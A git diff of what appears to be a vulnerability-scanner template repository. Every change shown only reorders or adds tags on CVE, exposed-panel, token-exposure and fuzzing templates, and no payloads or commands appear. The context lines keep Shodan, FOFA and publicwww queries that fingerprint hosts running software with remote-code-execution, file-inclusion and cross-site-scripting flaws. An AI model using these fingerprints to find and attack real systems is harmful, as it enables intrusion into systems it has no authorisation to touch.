index a8fbd88b73..0d911d178e 100644
--- a/http/cves/2023/CVE-2023-50917.yaml
+++ b/http/cves/2023/CVE-2023-50917.yaml
@@ -27,7 +27,7 @@ info:
product: majordomo
shodan-query: http.favicon.hash:1903390397
fofa-query: app="MajordomoSL"
- tags: cve,cve2023,majordomo,rce,os
+ tags: cve,cve2023,majordomo,rce,os,mjdm
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml
index d66ef850ab..839ab64358 100644
--- a/http/cves/2023/CVE-2023-50968.yaml
+++ b/http/cves/2023/CVE-2023-50968.yaml
@@ -22,7 +22,7 @@ info:
fofa-query: app="Apache_OFBiz"
vendor: apache
product: ofbiz
- tags: cve,cve2023,apache,ofbiz,ssrf
+ tags: cve2023,cve,apache,ofbiz,ssrf
variables:
str: "{{rand_base(6)}}"
diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml
index a25b599774..9174d43a9d 100644
--- a/http/cves/2023/CVE-2023-51467.yaml
+++ b/http/cves/2023/CVE-2023-51467.yaml
@@ -21,7 +21,7 @@ info:
product: ofbiz
shodan-query: html:"OFBiz"
fofa-query: app="Apache_OFBiz"
- tags: cve,cve2023,apache,ofbiz,rce
+ tags: cve2023,cve,apache,ofbiz,rce
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml
index cc71849ee4..fa74cbf058 100644
--- a/http/cves/2023/CVE-2023-5244.yaml
+++ b/http/cves/2023/CVE-2023-5244.yaml
@@ -26,7 +26,7 @@ info:
vendor: microweber
product: microweber
shodan-query: http.favicon.hash:780351152
- tags: huntr,cve,cve2023,xss,microweber
+ tags: cve,cve2023,huntr,xss,microweber
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml
index e3c14fb6d0..4dca092f6d 100644
--- a/http/cves/2023/CVE-2023-5360.yaml
+++ b/http/cves/2023/CVE-2023-5360.yaml
@@ -28,7 +28,7 @@ info:
product: royal_elementor_addons
framework: wordpress
publicwww-query: "/plugins/royal-elementor-addons/"
- tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
+ tags: cve2023,cve,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/cves/2023/CVE-2023-5375.yaml b/http/cves/2023/CVE-2023-5375.yaml
index 719c94c6ec..5731b8dfb7 100644
--- a/http/cves/2023/CVE-2023-5375.yaml
+++ b/http/cves/2023/CVE-2023-5375.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: mosparo
product: mosparo
- tags: huntr,cve,cve2023,mosparo,redirect
+ tags: cve2023,cve,huntr,mosparo,redirect
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-5556.yaml b/http/cves/2023/CVE-2023-5556.yaml
index b414fa1b9a..a76df34d51 100644
--- a/http/cves/2023/CVE-2023-5556.yaml
+++ b/http/cves/2023/CVE-2023-5556.yaml
@@ -24,7 +24,7 @@ info:
vendor: structurizr
product: on-premises_installation
shodan-query: http.favicon.hash:1199592666
- tags: cve,cve2023,xss,structurizr,oos,authenticated
+ tags: cve2023,cve,xss,structurizr,oos,authenticated
variables:
str: "{{randstr}}"
diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml
index 17dcc1b89d..ef68b27534 100644
--- a/http/cves/2023/CVE-2023-6018.yaml
+++ b/http/cves/2023/CVE-2023-6018.yaml
@@ -23,7 +23,7 @@ info:
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
- tags: cve,cve2023,mlflow,oss,rce,intrusive
+ tags: cve,cve2023,mlflow,oss,rce,intrusive,lfprojects
variables:
model_name: "{{rand_text_alpha(6)}}"
diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml
index f0366e485a..83ef8bae73 100644
--- a/http/cves/2023/CVE-2023-6020.yaml
+++ b/http/cves/2023/CVE-2023-6020.yaml
@@ -23,7 +23,7 @@ info:
vendor: ray_project
product: ray
shodan-query: http.favicon.hash:463802404
- tags: cve,cve2023,lfi,ray,oos
+ tags: cve2023,cve,lfi,ray,oos,ray_project
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml
index 18d860d7c5..16dd29a6a5 100644
--- a/http/cves/2023/CVE-2023-6021.yaml
+++ b/http/cves/2023/CVE-2023-6021.yaml
@@ -23,7 +23,7 @@ info:
vendor: ray_project
product: ray
shodan-query: html:"Ray Dashboard"
- tags: cve,cve2023,lfi,ray,oos
+ tags: cve,cve2023,lfi,ray,oos,ray_project
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml
index 23f76e6835..0492970f4d 100644
--- a/http/cves/2023/CVE-2023-6038.yaml
+++ b/http/cves/2023/CVE-2023-6038.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
product: h2o
vendor: h2o
- tags: cve,cve2023,h2o-3,h2o,ml
+ tags: cve2023,cve,h2o-3,h2o,ml
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml
index b6cc8a9d47..e7610527da 100644
--- a/http/cves/2023/CVE-2023-6379.yaml
+++ b/http/cves/2023/CVE-2023-6379.yaml
@@ -24,7 +24,7 @@ info:
vendor: alkacon
product: OpenCms
shodan-query: title:"opencms"
- tags: cve,cve2023,opencms,xss,alkacon
+ tags: cve2023,cve,opencms,xss,alkacon
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml
index 07c6bb8900..e8670f78ce 100644
--- a/http/cves/2023/CVE-2023-6380.yaml
+++ b/http/cves/2023/CVE-2023-6380.yaml
@@ -16,7 +16,7 @@ info:
max-request: 1
shodan-query: "/opencms/"
verified: true
- tags: cve,cve2023,redirect,opencms
+ tags: cve2023,cve,redirect,opencms
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml
index 8865a6a16f..04f2bfc9de 100644
--- a/http/cves/2023/CVE-2023-6623.yaml
+++ b/http/cves/2023/CVE-2023-6623.yaml
@@ -22,7 +22,7 @@ info:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/essential-blocks/"
- tags: cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi
+ tags: cve2023,cve,wp,wp-plugin,wordpress,essential-blocks,lfi
http:
- method: GET
diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml
index 84178d4fb9..2d753a700d 100644
--- a/http/cves/2024/CVE-2024-0352.yaml
+++ b/http/cves/2024/CVE-2024-0352.yaml
@@ -21,7 +21,7 @@ info:
max-request: 1
shodan-query: http.favicon.hash:874152924
vendor: likeshop
- tags: cve,cve2024,rce,file-upload,likeshop,instrusive
+ tags: cve2024,cve,rce,file-upload,likeshop,instrusive
variables:
filename: "{{rand_base(6)}}"
diff --git a/http/exposed-panels/adhoc-transfer-panel.yaml b/http/exposed-panels/adhoc-transfer-panel.yaml
index da7d8e7173..d1b89ff968 100644
--- a/http/exposed-panels/adhoc-transfer-panel.yaml
+++ b/http/exposed-panels/adhoc-transfer-panel.yaml
@@ -11,7 +11,7 @@ info:
vendor: progress
product: ws_ftp
shodan-query: http.title:"Ad Hoc Transfer"
- tags: panel,wsftp,ad-hoc,detect,login
+ tags: panel,wsftp,ad-hoc,detect,login,progress
http:
- method: GET
diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml
index b9129e2d51..b868705b08 100644
--- a/http/exposed-panels/adminer-panel-detect.yaml
+++ b/http/exposed-panels/adminer-panel-detect.yaml
@@ -17,7 +17,7 @@ info:
# Is generally handy if you find SQL creds
metadata:
max-request: 741
- tags: fuzz,adminer,login
+ tags: panel,fuzz,adminer,login,sqli
http:
- raw:
diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml
index 68bbed4370..207e9525ec 100644
--- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml
+++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml
@@ -14,7 +14,7 @@ info:
max-request: 1
shodan-query: http.favicon.hash:-1961736892
fofa-query: title="dzzoffice"
- tags: dzzoffice,install
+ tags: panel,dzzoffice,install
http:
- method: GET
diff --git a/http/exposed-panels/gryphon-login.yaml b/http/exposed-panels/gryphon-login.yaml
index 7a31da8cac..c59e4d6cb5 100644
--- a/http/exposed-panels/gryphon-login.yaml
+++ b/http/exposed-panels/gryphon-login.yaml
@@ -12,7 +12,7 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Gryphon"
- tags: gryphon,router
+ tags: panel,gryphon,router
http:
- method: GET
diff --git a/http/exposed-panels/laravel-filemanager.yaml b/http/exposed-panels/laravel-filemanager.yaml
index 4593a4740e..65311d44e0 100644
--- a/http/exposed-panels/laravel-filemanager.yaml
+++ b/http/exposed-panels/laravel-filemanager.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 1
- tags: laravel,filemanager,fileupload,intrusive
+ tags: panel,laravel,filemanager,fileupload,intrusive
http:
- method: GET
diff --git a/http/exposed-panels/luci-login-detection.yaml b/http/exposed-panels/luci-login-detection.yaml
index 67e0f29a48..66f10e3c75 100644
--- a/http/exposed-panels/luci-login-detection.yaml
+++ b/http/exposed-panels/luci-login-detection.yaml
@@ -11,7 +11,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 1
- tags: login
+ tags: panel,login
http:
- method: GET
diff --git a/http/exposed-panels/openbmcs-detect.yaml b/http/exposed-panels/openbmcs-detect.yaml
index df36231c80..4d2d0d180c 100644
--- a/http/exposed-panels/openbmcs-detect.yaml
+++ b/http/exposed-panels/openbmcs-detect.yaml
@@ -11,7 +11,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 1
- tags: openbmcs,detect
+ tags: panel,openbmcs,detect
http:
- method: GET
diff --git a/http/exposed-panels/opencpu-panel.yaml b/http/exposed-panels/opencpu-panel.yaml
index c608602b81..87f2144565 100644
--- a/http/exposed-panels/opencpu-panel.yaml
+++ b/http/exposed-panels/opencpu-panel.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 1
- tags: opencpu,oss
+ tags: panel,opencpu,oss
http:
- method: GET
diff --git a/http/exposed-panels/openwrt/openwrt-luci-panel.yaml b/http/exposed-panels/openwrt/openwrt-luci-panel.yaml
index 012bafe200..2cdcf7c7d2 100644
--- a/http/exposed-panels/openwrt/openwrt-luci-panel.yaml
+++ b/http/exposed-panels/openwrt/openwrt-luci-panel.yaml
@@ -10,7 +10,7 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"OpenWrt - LuCI"
- tags: default-login,openwrt
+ tags: panel,default-login,openwrt
http:
- method: GET
diff --git a/http/exposed-panels/sap-successfactors-detect.yaml b/http/exposed-panels/sap-successfactors-detect.yaml
index 9c79d3f3c1..feac034d56 100644
--- a/http/exposed-panels/sap-successfactors-detect.yaml
+++ b/http/exposed-panels/sap-successfactors-detect.yaml
@@ -13,7 +13,7 @@ info:
verified: true
max-request: 2
shodan-query: title:"Login - SAP SuccessFactors"
- tags: sap,detect
+ tags: panel,sap,detect
http:
- method: GET
diff --git a/http/exposed-panels/satis-repository.yaml b/http/exposed-panels/satis-repository.yaml
index 59c0c55d20..0a14d43aca 100644
--- a/http/exposed-panels/satis-repository.yaml
+++ b/http/exposed-panels/satis-repository.yaml
@@ -16,7 +16,7 @@ info:
verified: true
max-request: 1
shodan-query: html:"Satis"
- tags: exposure,composer,satis
+ tags: panel,exposure,composer,satis
http:
- method: GET
diff --git a/http/exposed-panels/server-backup-login.yaml b/http/exposed-panels/server-backup-login.yaml
index 91b0a05ace..d30b16c686 100644
--- a/http/exposed-panels/server-backup-login.yaml
+++ b/http/exposed-panels/server-backup-login.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 1
- tags: paneil,idera,edb
+ tags: panel,paneil,idera,edb
http:
- method: GET
diff --git a/http/exposed-panels/unauth/tautulli-unauth.yaml b/http/exposed-panels/unauth/tautulli-unauth.yaml
index 7fe96313ed..839392845f 100644
--- a/http/exposed-panels/unauth/tautulli-unauth.yaml
+++ b/http/exposed-panels/unauth/tautulli-unauth.yaml
@@ -8,7 +8,7 @@ info:
verified: true
max-request: 1
shodan-query: title:"Tautulli - Home"
- tags: misconfig,tautulli,unauth,exposure
+ tags: panel,misconfig,tautulli,unauth,exposure
http:
- method: GET
diff --git a/http/exposed-panels/ws_ftp-server-web-transfer.yaml b/http/exposed-panels/ws_ftp-server-web-transfer.yaml
index 15a3333fd5..855bf1f71b 100644
--- a/http/exposed-panels/ws_ftp-server-web-transfer.yaml
+++ b/http/exposed-panels/ws_ftp-server-web-transfer.yaml
@@ -16,7 +16,7 @@ info:
product: ws_ftp
shodan-query: http.title:"WS_FTP Server Web Transfer"
censys-query: services.http.request.uri="*/ThinClient/WTM/public/index.html"
- tags: panel,ws_ftp
+ tags: panel,ws_ftp,progress
http:
- method: GET
diff --git a/http/exposures/logs/ffserver-status.yaml b/http/exposures/logs/ffserver-status.yaml
index ff2670714d..378eeecdf6 100644
--- a/http/exposures/logs/ffserver-status.yaml
+++ b/http/exposures/logs/ffserver-status.yaml
@@ -9,7 +9,7 @@ info:
verified: true
max-request: 1
shodan-query: title:"ffserver Status"
- tags: exposures,logs,ffserver
+ tags: exposure,exposures,logs,ffserver
http:
- method: GET
diff --git a/http/exposures/tokens/finicity/finicity-clientsecret.yaml b/http/exposures/tokens/finicity/finicity-clientsecret.yaml
index 166b4e467f..a0a78a62da 100644
--- a/http/exposures/tokens/finicity/finicity-clientsecret.yaml
+++ b/http/exposures/tokens/finicity/finicity-clientsecret.yaml
@@ -10,7 +10,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: finicity,file,token
+ tags: exposure,finicity,file,token
http:
- method: GET
diff --git a/http/exposures/tokens/finicity/finicity-token.yaml b/http/exposures/tokens/finicity/finicity-token.yaml
index 9f072eb8c7..1ab59093ed 100644
--- a/http/exposures/tokens/finicity/finicity-token.yaml
+++ b/http/exposures/tokens/finicity/finicity-token.yaml
@@ -10,7 +10,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: finicity,file,token
+ tags: exposure,finicity,file,token
http:
- method: GET
diff --git a/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml b/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml
index b1279f96eb..57d239ca2b 100644
--- a/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml
+++ b/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml
@@ -10,7 +10,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: finnhub,file,token
+ tags: exposure,finnhub,file,token
http:
- method: GET
diff --git a/http/exposures/tokens/gitter/gitter-token.yaml b/http/exposures/tokens/gitter/gitter-token.yaml
index f8293360a3..39ac52e4b7 100644
--- a/http/exposures/tokens/gitter/gitter-token.yaml
+++ b/http/exposures/tokens/gitter/gitter-token.yaml
@@ -10,7 +10,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: gitter,file,keys
+ tags: exposure,gitter,file,keys
http:
- method: GET
diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/cache-poisoning-fuzz.yaml
index e7d8f057fa..51ee64d28d 100644
--- a/http/fuzzing/cache-poisoning-fuzz.yaml
+++ b/http/fuzzing/cache-poisoning-fuzz.yaml
@@ -9,7 +9,7 @@ info:
- https://portswigger.net/web-security/web-cache-poisoning
metadata:
max-request: 5834
- tags: fuzz,cache
+ tags: fuzzing,fuzz,cache
http:
- raw:
diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/header-command-injection.yaml
index 37e89e1c57..3e9e136cf8 100644
--- a/http/fuzzing/header-command-injection.yaml
+++ b/http/fuzzing/header-command-injection.yaml
@@ -11,7 +11,7 @@ info:
cwe-id: CWE-77
metadata:
max-request: 7650
- tags: fuzz,rce
+ tags: fuzzing,fuzz,rce
http:
- raw:
diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml
index ba912c1a78..6d65906f9a 100644
--- a/http/fuzzing/iis-shortname.yaml
+++ b/http/fuzzing/iis-shortname.yaml
@@ -15,7 +15,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 4
- tags: fuzz,edb
+ tags: fuzzing,fuzz,edb
http:
- raw:
diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/linux-lfi-fuzzing.yaml
index f07698d2f8..88cdff7248 100644
--- a/http/fuzzing/linux-lfi-fuzzing.yaml
+++ b/http/fuzzing/linux-lfi-fuzzing.yaml
@@ -11,7 +11,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 22
- tags: linux,lfi,fuzz
+ tags: fuzzing,linux,lfi,fuzz
http:
- method: GET
diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/mdb-database-file.yaml
index 50bac14fbc..41561c4a56 100644
--- a/http/fuzzing/mdb-database-file.yaml
+++ b/http/fuzzing/mdb-database-file.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 341
- tags: fuzz,mdb,asp
+ tags: fuzzing,fuzz,mdb,asp
http:
- raw:
diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/prestashop-module-fuzz.yaml
index 296f75cde1..666c558b68 100644
--- a/http/fuzzing/prestashop-module-fuzz.yaml
+++ b/http/fuzzing/prestashop-module-fuzz.yaml
@@ -6,7 +6,7 @@ info:
severity: info
metadata:
max-request: 639
- tags: fuzz,prestashop
+ tags: fuzzing,fuzz,prestashop
http:
- raw:
diff --git a/http/fuzzing/ssrf-via-proxy.yaml b/http/fuzzing/ssrf-via-proxy.yaml
index 092b19e59a..410676244f 100644
--- a/http/fuzzing/ssrf-via-proxy.yaml
+++ b/http/fuzzing/ssrf-via-proxy.yaml
@@ -10,7 +10,7 @@ info:
- https://twitter.com/ImoJOnDz/status/1649089777629827072
metadata:
max-request: 9
- tags: ssrf,proxy,oast,fuzz
+ tags: fuzzing,ssrf,proxy,oast,fuzz
http:
- payloads:
diff --git a/http/fuzzing/valid-gmail-check.yaml b/http/fuzzing/valid-gmail-check.yaml
index a8df6e05ab..afa6ed7ded 100644
--- a/http/fuzzing/valid-gmail-check.yaml
+++ b/http/fuzzing/valid-gmail-check.yaml
@@ -8,7 +8,7 @@ info:
- https://github.com/dievus/geeMailUserFinder
metadata:
max-request: 1
- tags: fuzz,gmail
+ tags: fuzzing,fuzz,gmail
self-contained: true
diff --git a/http/fuzzing/waf-fuzz.yaml b/http/fuzzing/waf-fuzz.yaml
index d50129eed1..1db3282384 100644
--- a/http/fuzzing/waf-fuzz.yaml
+++ b/http/fuzzing/waf-fuzz.yaml
@@ -11,7 +11,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 58
- tags: waf,tech,fuzz
+ tags: fuzzing,waf,tech,fuzz
http:
- raw:
diff --git a/http/fuzzing/wordpress-plugins-detect.yaml b/http/fuzzing/wordpress-plugins-detect.yaml
index 93285d39f7..fe019d2a84 100644
--- a/http/fuzzing/wordpress-plugins-detect.yaml
+++ b/http/fuzzing/wordpress-plugins-detect.yaml
@@ -6,7 +6,7 @@ info:
severity: info
metadata:
max-request: 98135
- tags: fuzz,wordpress
+ tags: fuzzing,fuzz,wordpress
http:
- raw:
diff --git a/http/fuzzing/wordpress-themes-detect.yaml b/http/fuzzing/wordpress-themes-detect.yaml
index c6f7c7a2ee..d9ad0c37a6 100644
--- a/http/fuzzing/wordpress-themes-detect.yaml
+++ b/http/fuzzing/wordpress-themes-detect.yaml
@@ -6,7 +6,7 @@ info:
severity: info
metadata:
max-request: 24434
- tags: fuzz,wordpress
+ tags: fuzzing,fuzz,wordpress
http:
- raw:
diff --git a/http/fuzzing/wordpress-weak-credentials.yaml b/http/fuzzing/wordpress-weak-credentials.yaml
index 9b2b887072..dfa8b4350e 100644
--- a/http/fuzzing/wordpress-weak-credentials.yaml
+++ b/http/fuzzing/wordpress-weak-credentials.yaml
@@ -14,7 +14,7 @@ info:
cwe-id: CWE-1391
metadata:
max-request: 276
- tags: wordpress,default-login,fuzz
+ tags: fuzzing,wordpress,default-login,fuzz
http:
- raw:
diff --git a/http/fuzzing/xff-403-bypass.yaml b/http/fuzzing/xff-403-bypass.yaml
index 36bcd56356..ebf0365524 100644
--- a/http/fuzzing/xff-403-bypass.yaml
+++ b/http/fuzzing/xff-403-bypass.yaml
@@ -7,7 +7,7 @@ info:
description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header.
metadata:
max-request: 3
- tags: fuzz
+ tags: fuzzing,fuzz
http:
- raw:
diff --git a/http/miscellaneous/addeventlistener-detect.yaml b/http/miscellaneous/addeventlistener-detect.yaml
index bdb36cf188..c4e2e797a6 100644
--- a/http/miscellaneous/addeventlistener-detect.yaml
+++ b/http/miscellaneous/addeventlistener-detect.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-79
metadata:
max-request: 1
- tags: xss,misc
+ tags: miscellaneous,xss,misc
http:
- method: GET
diff --git a/http/miscellaneous/apple-app-site-association.yaml b/http/miscellaneous/apple-app-site-association.yaml
index 85a8797703..1f95152fda 100644
--- a/http/miscellaneous/apple-app-site-association.yaml
+++ b/http/miscellaneous/apple-app-site-association.yaml
@@ -6,7 +6,7 @@ info:
severity: info
metadata:
max-request: 3
- tags: misc,apple
+ tags: miscellaneous,misc,apple
http:
- method: GET
diff --git a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml
index 0b01014515..771ed9056a 100644
--- a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml
+++ b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml
@@ -9,7 +9,7 @@ info:
- https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect
metadata:
max-request: 2
- tags: aws,docker,ec2,misc
+ tags: miscellaneous,aws,docker,ec2,misc
http:
- method: GET
diff --git a/http/miscellaneous/clientaccesspolicy.yaml b/http/miscellaneous/clientaccesspolicy.yaml
index 729e96c349..2f78e9d3e0 100644
--- a/http/miscellaneous/clientaccesspolicy.yaml
+++ b/http/miscellaneous/clientaccesspolicy.yaml
@@ -6,7 +6,7 @@ info:
severity: info
metadata:
max-request: 1
- tags: misc
+ tags: miscellaneous,misc
http:
- method: GET
diff --git a/http/miscellaneous/crypto-mining-malware.yaml b/http/miscellaneous/crypto-mining-malware.yaml
index 1fc3cc984c..4988f2547a 100644
--- a/http/miscellaneous/crypto-mining-malware.yaml
+++ b/http/miscellaneous/crypto-mining-malware.yaml
@@ -10,7 +10,7 @@ info:
- https://github.com/xd4rker/MinerBlock/blob/master/assets/filters.txt
metadata:
max-request: 1
- tags: malware,crypto,mining,misc,generic
+ tags: miscellaneous,malware,crypto,mining,misc,generic
http:
- method: GET
diff --git a/http/miscellaneous/defaced-website-detect.yaml b/http/miscellaneous/defaced-website-detect.yaml
index 2c60ac489a..a5f1c29b18 100644
--- a/http/miscellaneous/defaced-website-detect.yaml
+++ b/http/miscellaneous/defaced-website-detect.yaml
@@ -9,7 +9,7 @@ info:
verified: 'true'
max-request: 1
shodan-query: http.title:"Hacked By"
- tags: defacement,misc
+ tags: miscellaneous,defacement,misc
http:
- method: GET
diff --git a/http/miscellaneous/detect-dns-over-https.yaml b/http/miscellaneous/detect-dns-over-https.yaml
index 239f2cc3e5..1f9827a067 100644
--- a/http/miscellaneous/detect-dns-over-https.yaml
+++ b/http/miscellaneous/detect-dns-over-https.yaml
@@ -11,7 +11,7 @@ info:
- https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat
metadata:
max-request: 1
- tags: dns,doh,misc
+ tags: miscellaneous,dns,doh,misc
http:
- method: GET
diff --git a/http/miscellaneous/dir-listing.yaml b/http/miscellaneous/dir-listing.yaml
index dc8be52eb1..3e29698add 100644
--- a/http/miscellaneous/dir-listing.yaml
+++ b/http/miscellaneous/dir-listing.yaml
@@ -8,7 +8,7 @@ info:
- https://portswigger.net/kb/issues/00600100_directory-listing
metadata:
max-request: 1
- tags: misc,generic
+ tags: miscellaneous,misc,generic
http:
- method: GET
diff --git a/http/miscellaneous/email-extractor.yaml b/http/miscellaneous/email-extractor.yaml
index eb86d2a897..dc7dcb44ce 100644
--- a/http/miscellaneous/email-extractor.yaml
+++ b/http/miscellaneous/email-extractor.yaml
@@ -6,7 +6,7 @@ info:
severity: info
metadata:
max-request: 1
- tags: misc,email,generic
+ tags: miscellaneous,misc,email,generic
http:
- method: GET
diff --git a/http/miscellaneous/exposed-file-upload-form.yaml b/http/miscellaneous/exposed-file-upload-form.yaml
index df8da57eec..82d7a1de1c 100644
--- a/http/miscellaneous/exposed-file-upload-form.yaml
+++ b/http/miscellaneous/exposed-file-upload-form.yaml
@@ -8,7 +8,7 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"multipart/form-data" html:"file"
- tags: exposure,upload,form,misc,generic
+ tags: miscellaneous,exposure,upload,form,misc,generic
http:
- method: GET
diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml
index 2c3c06b074..24ef150f92 100644
--- a/http/miscellaneous/external-service-interaction.yaml
+++ b/http/miscellaneous/external-service-interaction.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-918,CWE-406
metadata:
max-request: 1
- tags: http,misc,oast
+ tags: miscellaneous,http,misc,oast
http:
- method: GET
diff --git a/http/miscellaneous/firebase-database-extractor.yaml b/http/miscellaneous/firebase-database-extractor.yaml
index abb7e41d1f..3fcaff1982 100644
--- a/http/miscellaneous/firebase-database-extractor.yaml
+++ b/http/miscellaneous/firebase-database-extractor.yaml
@@ -7,7 +7,7 @@ info:
description: Extract Firebase Database
metadata:
max-request: 1
- tags: firebase,misc
+ tags: miscellaneous,firebase,misc
http:
- method: GET
diff --git a/http/miscellaneous/google-floc-disabled.yaml b/http/miscellaneous/google-floc-disabled.yaml
index a8c969254b..66eb939cb3 100644
--- a/http/miscellaneous/google-floc-disabled.yaml
+++ b/http/miscellaneous/google-floc-disabled.yaml
@@ -9,7 +9,7 @@ info:
- https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/
metadata:
max-request: 1
- tags: google,floc,misc
+ tags: miscellaneous,google,floc,misc
http:
- method: GET
diff --git a/http/miscellaneous/gpc-json.yaml b/http/miscellaneous/gpc-json.yaml
index c426f0d41b..7e4f61d840 100644
--- a/http/miscellaneous/gpc-json.yaml
+++ b/http/miscellaneous/gpc-json.yaml
@@ -9,7 +9,7 @@ info:
metadata:
verified: true
max-request: 2
- tags: misc,generic,gpc
+ tags: miscellaneous,misc,generic,gpc
http:
- method: GET
diff --git a/http/miscellaneous/htaccess-config.yaml b/http/miscellaneous/htaccess-config.yaml
index 6b36f95182..f0c7c3e02c 100644
--- a/http/miscellaneous/htaccess-config.yaml
+++ b/http/miscellaneous/htaccess-config.yaml
@@ -6,7 +6,7 @@ info:
severity: info
metadata:
max-request: 6
- tags: misc,config
+ tags: miscellaneous,misc,config
http:
- method: GET
diff --git a/http/miscellaneous/http-trace.yaml b/http/miscellaneous/http-trace.yaml
index ed5f3e0b90..3ffa78f9fa 100644
--- a/http/miscellaneous/http-trace.yaml
+++ b/http/miscellaneous/http-trace.yaml
@@ -8,7 +8,7 @@ info:
- https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/
metadata:
max-request: 2
- tags: misc,generic
+ tags: miscellaneous,misc,generic
http:
- method: TRACE
diff --git a/http/miscellaneous/joomla-htaccess.yaml b/http/miscellaneous/joomla-htaccess.yaml
index 38a84b59d3..a5bf5ccab7 100644
--- a/http/miscellaneous/joomla-htaccess.yaml
+++ b/http/miscellaneous/joomla-htaccess.yaml
@@ -7,7 +7,7 @@ info:
description: Joomla! has an htaccess file to store configurations about HTTP config, directory listing, etc.
metadata:
max-request: 1
- tags: misc,joomla
+ tags: miscellaneous,misc,joomla
http:
- method: GET
diff --git a/http/miscellaneous/joomla-manifest-file.yaml b/http/miscellaneous/joomla-manifest-file.yaml
index 88814ea4a5..633bf9fedc 100644
--- a/http/miscellaneous/joomla-manifest-file.yaml
+++ b/http/miscellaneous/joomla-manifest-file.yaml
@@ -11,7 +11,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 1
- tags: misc,joomla
+ tags: miscellaneous,misc,joomla
http:
- method: GET
diff --git a/http/miscellaneous/microsoft-azure-error.yaml b/http/miscellaneous/microsoft-azure-error.yaml
index cd8a2ce87e..2054749166 100644
--- a/http/miscellaneous/microsoft-azure-error.yaml
+++ b/http/miscellaneous/microsoft-azure-error.yaml
@@ -7,7 +7,7 @@ info:
metadata:
max-request: 1
shodan-query: title:"Microsoft Azure Web App - Error 404"
- tags: error,azure,microsoft,misc
+ tags: miscellaneous,error,azure,microsoft,misc
http:
- method: GET
diff --git a/http/miscellaneous/moodle-changelog.yaml b/http/miscellaneous/moodle-changelog.yaml
index 3157afaad5..70c0797e82 100644
--- a/http/miscellaneous/moodle-changelog.yaml
